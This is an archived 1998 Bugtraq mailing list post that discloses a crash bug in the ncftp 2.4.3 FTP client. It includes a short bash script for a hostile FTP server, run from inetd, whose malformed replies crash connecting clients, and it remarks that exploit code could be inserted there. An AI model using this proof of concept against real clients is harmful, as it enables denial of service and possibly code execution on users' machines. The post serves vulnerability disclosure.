Bugtraq mailing list archives
ncftp 2.4.3 bug
From: paul () BOEHM ORG (Paul Boehm)
Date: Sun, 21 Jun 1998 00:52:33 +0200
Hi, i think i've found a bug in ncftp 2.4.3 (latest stable release)... if you connect to a ftp server that responds with something like the shit below ncftp2.4.3 segfaults. i think this is exploitable, but had no time/motivation to look further into it. probably this isn't very dangerous anyway cause your victim needs to connect willingly, and using ncftp to your server.. that won't happen very often unless you've been talking with your victim before. anyway i thought it may be a good idea to post it, so here it is: --snip-- ncftpcrashd.sh #!/bin/bash # ncftp2.4.3 crash by infected () cia at # Start this using inetd. (port 21) echo "331 hi, barbie.. wanna crash with me?" echo "230 sure ken!" echo "then hop in" --snip-- every reply that looks like this works: 331 a 230 b c[putting here some exploit code may work] bye, paul PS: i have no clue why this crashes ncftp... i haven't looked through ncftp's source, but maybe someone else will. -- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Name: Paul S. Boehm || Freelance Security Consulter. Email: paul () is destructive org || PGPkey available at: Url: http://paul.boehm.org/ || http://paul.boehm.org/paul-pgp.asc -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- There is is no reason for any individual to have a computer in their home. --Ken Olsen (Digital Corp CEO) 1977. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Current thread:
- ncftp 2.4.3 bug Paul Boehm (Jun 20)
- <Possible follow-ups>
- Re: ncftp 2.4.3 bug Mike Gleason (Jun 22)
- Re: ncftp 2.4.3 bug Paul Boehm (Jun 22)
- Re: ncftp 2.4.3 bug Liviu Daia (Jun 23)
- textcounter.pl SECURITY HOLE Doru Petrescu (Jun 23)
- Re: textcounter.pl SECURITY HOLE Rich Lafferty (Jun 24)
- Yipes named attack Anonymous (Jun 24)
- security hole in mailx Alvaro Martinez Echevarria (Jun 24)
- Re: security hole in mailx gold (Jun 25)
- Re: security hole in mailx Casper Dik (Jun 25)
- Bug is sudo? Rhodie (Jun 25)